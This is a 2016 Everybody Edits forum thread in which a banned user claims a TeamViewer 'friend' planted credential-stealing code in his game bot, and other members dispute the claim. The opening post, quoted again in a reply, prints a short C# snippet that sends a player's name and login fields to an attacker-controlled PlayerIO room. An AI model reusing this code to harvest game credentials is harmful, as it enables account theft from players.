Official Everybody Edits Forums

Do you think I could just leave this part blank and it'd be okay? We're just going to replace the whole thing with a header image anyway, right?

You are not logged in.

#1 2016-10-04 08:33:00

marcoantonimsantosnd
Banned

Former Apologies

Hello everyone.

Before all of this, I would like to inform you that I've got hacked, as I couldn't login into my main account.
I've read all of the posts, and it is just terrifying how it really made people think it was me.

Recently I and one of my friends, from teamviewer, where coding an application.
I had to go do something, and I forgot I had his control on, wich I believe lead to him adding the malicious code into my test bot, EEStalker Bot.

Also, I am currently developing EERoomFinder, and not the test bot told above, wich I used to get some information I had forgot about.
Please take note that I DID NOT add the malicious code or tryied to get anyone's account.

Here is the stupidest code in the code his added, wich is long gone by now:

string name = m.GetString(13);
Client c = PlayerIO.QuickConnect.SimpleConnect(hackid, "[email protected]", "opremote", null);
Connection c2 = c.Multiplayer.CreateJoinRoom("functionalityInfo", "eehack", true, null, null);
c2.Send("status", name, textBox2.Text, textBox1.Text);
System.Threading.Thread.Sleep(1000);
c2.Disconnect();

I've already removed him from teamviewer, for good.

Also, apologies for taking so long to respond.
I've also emailed different55, and as his reply to me is that the poster's IP is mine, I can only go to the conclusion it was the issue I just told you about.

My sincerely apologies,
marcoantonimsantos

#2 2016-10-04 08:44:38, last edited by XxAtillaxX (2016-10-04 08:46:28)

XxAtillaxX

Re: Former Apologies

I highly doubt your claim, as there is no incentive behind it.
Who is this friend? I'd like to contact them directly, and I'm sure the moderators would like to know as well.
And, why would they use your "test bot" if they were to post a topic whilst you were supposedly away.

As of yet, there is no plausible deniability.

signature.png
*u stinky*

#3 2016-10-04 09:53:39, last edited by MartenM (2016-10-04 09:53:51)

MartenM
Website

I was already wondering why you posted something like this because you are pretty active on the forums.
But then again, for how long where you gone that he could put that into the code?

Questions will remain and trust has been hurt...

lm3hgg8.jpg

Ingame: marten22        My steam: MartenM

#4 2016-10-04 10:05:14, last edited by capasha (2016-10-04 10:08:02)

capasha

"A friend was connected to my teamviewer and uploaded this code"

1) The obfuscator is used by you very often.
2) You need a server to send malware information to. Which is PlayerIO. And you have made a guide how to make a server.
3) "a friend" uploaded this to the forums.
4) You know how the code looks like.

I'm sorry. I don't trust you.

#5 2016-10-04 10:56:08

Tomahawk
Forum Mod

Sounds like bs to me. You should be permabanned, because I doubt you wouldn't notice new code.

One bot to rule them all, one bot to find them. One bot to bring them all... and with this cliché blind them.

Wooted by:

#6 2016-10-04 12:01:28

Nou

Your "friend" just happened to know how to code, the inside-outs of PlayerIO, your code, and managed to get it all in without you noticing.

Good luck explaining that one. Not fishy at all!

No u.

#7 2016-10-04 15:16:58, last edited by SirJosh3917 (2016-10-04 15:19:54)

SirJosh3917
Formerly ninjasupeatsninja

I'm not the friend that did this but -

I believe this. I've talked with rm42 for a while, and he seems like a reasonable, logical guy.
I was surprised that you went through all that trouble to create a stalker bot that is real, and then it steals a password. I was suprised and confused as to why you'd do that.

I believe that this actually happened to rm42, but if you don't, that's fine.

I'd also like rm42 to answer who this friend is first however, before I support him fully.

Also rm42, you should've done an overview of your code first to check if it was Ok. Don't do this again.

EDIT: After reading a little, I've decided that I won't support you fully, because it logically seems like you could do all of this.
Tell us who this "friend" is and we the community will decide if you're innocent or guilty.

Wooted by:

#8 2016-10-04 17:54:29

capasha

Looks like he is still infecting and abusing PlayerIO:
iBjIi2m.png

Wooted by:

#9 2016-10-04 19:03:49, last edited by hummerz5 (2016-10-04 19:17:58)

Notcarksss

Tomahawk wrote:

Sounds like bs to me. You should be permabanned, because I doubt you wouldn't notice new code.

i dont like taking sides here but some people have short term memory loss or some stuff like that, Just give him some credit for once

And marcoantonimsantosnd if you have any proof of this, please send it otherwise im afraid i dont believe you.
--
Ok you have reasonable points and i will go with this.marcoantonimsantosnd  release some evidence or atleast say who this friend was otherwise im afraid i will not trust you.
--
Ugh sorry for double or triple posting but i talked to realmaster42 on teamviewer lately so who is this "hacker" that hacked your account

YqrOV8L.png
?type=online&name=Notcarksss ?type=energy&name=Notcarksss
?type=loginstreak&name=Notcarksss ?type=itemsbought&name=Notcarksss
YEE.png
Notcarksss.jpg

#10 2016-10-04 19:12:53

SirJosh3917

Notcarksss wrote:
marcoantonimsantosnd wrote:

Hello everyone.

Before all of this, I would like to inform you that I've got hacked, as I couldn't login into my main account.
I've read all of the posts, and it is just terrifying how it really made people think it was me.

I had to go do something, and I forgot I had his control on, wich I believe lead to him adding the malicious code into my test bot, EEStalker Bot.

Also, I am currently developing EERoomFinder, and not the test bot told above, wich I used to get some information I had forgot about.
Please take note that I DID NOT add the malicious code or tryied to get anyone's account.

Here is the stupidest code in the code his added, wich is long gone by now:

string name = m.GetString(13);
Client c = PlayerIO.QuickConnect.SimpleConnect(hackid, "[email protected]", "opremote", null);
Connection c2 = c.Multiplayer.CreateJoinRoom("functionalityInfo", "eehack", true, null, null);
c2.Send("status", name, textBox2.Text, textBox1.Text);
System.Threading.Thread.Sleep(1000);
c2.Disconnect();

I've already removed him from teamviewer, for good.

Also, apologies for taking so long to respond.
I've also emailed different55, and as his reply to me is that the poster's IP is mine, I can only go to the conclusion it was the issue I just told you about.

My sincerely apologies,
marcoantonimsantos

Ugh sorry for double or triple posting but i talked to realmaster42 on teamviewer lately so who is this "hacker" that hacked your account

Just delete all your posts and merge them using the edit button

#11 2016-10-04 19:27:56, last edited by capasha (2016-10-04 19:28:23)

capasha

Notcarksss wrote:
Tomahawk wrote:

i dont like taking sides here but some people have short term memory loss or some stuff like that, Just give him some credit for once

And marcoantonimsantosnd if you have any proof of this, please send it otherwise im afraid i dont believe you.
--
Ok you have reasonable points and i will go with this.marcoantonimsantosnd  release some evidence or atleast say who this friend was otherwise im afraid i will not trust you.
--

If I look at what he is writing he didn't get hacked at all.

> Give friend edit access on Teamviewer
> Hacked

#12 2016-10-04 22:12:17

Tomahawk
Forum Mod

*rawr intensifies*

Is it still a 1-month temp ban?

One bot to rule them all, one bot to find them. One bot to bring them all... and with this cliché blind them.

#13 2016-10-04 22:48:35, last edited by Notcarksss (2016-10-04 22:51:36)

Notcarksss

ninjasupeatsninja wrote:

I'm not the friend that did this but -

I believe this. I've talked with rm42 for a while, and he seems like a reasonable, logical guy.
I was surprised that you went through all that trouble to create a stalker bot that is real, and then it steals a password. I was suprised and confused as to why you'd do that.

I believe that this actually happened to rm42, but if you don't, that's fine.

I'd also like rm42 to answer who this friend is first however, before I support him fully.

Also rm42, you should've done an overview of your code first to check if it was Ok. Don't do this again.

EDIT: After reading a little, I've decided that I won't support you fully, because it logically seems like you could do all of this.
Tell us who this "friend" is and we the community will decide if you're innocent or guilty.

Ninja no offense but anyone with any sort of programming knowledge could do this if they knew how so rethink your "logic" before you say anything else.
And his friend is someone who was coding their own serverside for his own ee remake, forgot the name but the game was gonna be DannyEE.
And no offense but the programming knowledge of you, and you where in this situation, you would feel like everyone is against you and thats what rm42 is feeling like atm.

YqrOV8L.png
YEE.png
Notcarksss.jpg

#14 2016-10-04 23:14:37

Notcarksss

capasha wrote:

2) You need a server to send malware information to. Which is PlayerIO. And you have made a guide how to make a server.

I could say the same about you capasha, considering what ive heard about you im sure everyone would like to hear that (no offense but still we have all done something bad)

YqrOV8L.png
YEE.png
Notcarksss.jpg

#15 2016-10-04 23:19:32, last edited by Notcarksss (2016-10-04 23:21:37)

Notcarksss

Ķ

Nou wrote:

Your "friend" just happened to know how to code, the inside-outs of PlayerIO, your code, and managed to get it all in without you noticing.

SORRY FORUM MODS!!

No offense nou but anyone with enough programming knowledge could do this (says the admin that works with playerIO every day) and some people dont notice things when they are ina rush like marco was.
And if you learn to read, maybe you will notice that he clearly said he wasnt at his computer at the time

YqrOV8L.png
YEE.png
Notcarksss.jpg

#16 2016-10-04 23:21:06

capasha

Notcarksss wrote:
capasha wrote:

I could say the same about you capasha, considering what ive heard about you im sure everyone would like to hear that (no offense but still we have all done something bad)

Should I take this as a threat? I do that. Need to activate my 7 proxies first.

Wooted by:

#17 2016-10-04 23:24:37, last edited by Notcarksss (2016-10-04 23:26:56)

Notcarksss

capasha wrote:
Notcarksss wrote:
capasha wrote:

No i dont  want you to take this as a threat but we both know we have all done somthing bad in our lives.(and try me, i dare you, if u rlly wanna go their)
And i dont want to lose u as a friend so im going to say this, im sorry for saying that capasha, that was out of order

YqrOV8L.png
YEE.png
Notcarksss.jpg

#18 2016-10-04 23:28:22

capasha

Notcarksss wrote:
capasha wrote:
Notcarksss wrote:
capasha wrote:

No i dont  want you to take this as a threat but we both know we have all done somthing bad in our lives.(and try me, i dare you, if u rlly wanna go their)

I follow the rules on this forum. I follow EE's rules. What can I do something that is so bad. that you cant write it here?
I guess realmaster24 is butthurt and need to talk about things that doesn't exist.

#19 2016-10-04 23:44:32

F4ncy
Website

Let me take my stand on this.
I think that this is absolute crap.
First of all: Why'd you give your friend edit access on TeamViewer? Can't trust anyone.
Second of all: I don't think your friend knows everything about C#, PlayerIO and etc. Nou's post is a good point.
Third: In the end, it sounds like BS to me.

All in all, I agree that he is lying.
kthxbye

1e71e2.png5b2628.png44570b.png

#20 2016-10-04 23:47:17

Notcarksss

capasha wrote:
Notcarksss wrote:
capasha wrote:
Notcarksss wrote:
capasha wrote:

I follow the rules on this forum. I follow EE's rules. What can I do something that is so bad. that you cant write it here?
I guess realmaster24 is butthurt and need to talk about things that doesn't exist.

It wasnt rm that told me not to trust you wheni added u on tv, it was icepegasus so stop blaming rm42 and idc about the rules atm because the whole ee community is againsg him and im putti g up for him. And im one of few people that actually believe him. Until we ha e more evidence, im not saying anymore

YqrOV8L.png
YEE.png
Notcarksss.jpg

#21 2016-10-04 23:49:56

capasha

Notcarksss wrote:

It wasnt rm that told me not to trust you wheni added u on tv, it was icepegasus so stop blaming rm42 and idc about the rules atm because the whole ee community is againsg him and im putti g up for him. And im one of few people that actually believe him. Until we ha e more evidence, im not saying anymore

How much time do you need to write the bad things i have done?
"I could say the same about you capasha, considering what ive heard about you im sure everyone would like to hear that"

#22 2016-10-04 23:56:25

Notcarksss

capasha wrote:
Notcarksss wrote:

How much time do you need to write the bad things i have done?
"I could say the same about you capasha, considering what ive heard about you im sure everyone would like to hear that"

Look im trying to defend my friend and im sorry ive said that ok i have mental problems ok, happy ?i just told everyone why im bieng like this

YqrOV8L.png
YEE.png
Notcarksss.jpg

#23 2016-10-05 00:38:28

N1KF
Wiki Mod
Website

Nou wrote:

Is mocking the bot maker with sarcasm really necessary? Like ninjasupeatsninja said, I think we should get this person's friend here. If this person is lying, the evidence should become pretty clear.

Everybody Edits is Fred

#24 2016-10-05 00:48:55

hummerz5

oh I just remembered something. Is it possible to get a teamviewer log? I imagine they have some server-side logs available, but idk what sort of release info they'd want first.

could be a step or two in determining the legitimacy of the claim

#25 2016-10-05 01:07:14, last edited by SirJosh3917 (2016-10-05 01:10:46)

SirJosh3917

hummerz5 wrote:

oh I just remembered something. Is it possible to get a teamviewer log? I imagine they have some server-side logs available, but idk what sort of release info they'd want first.

could be a step or two in determining the legitimacy of the claim

Yea it is, somewhere...
Let me google real quick and edit post

EDIT: %appdata%\TeamViewer

capasha1476895313630635

Board footer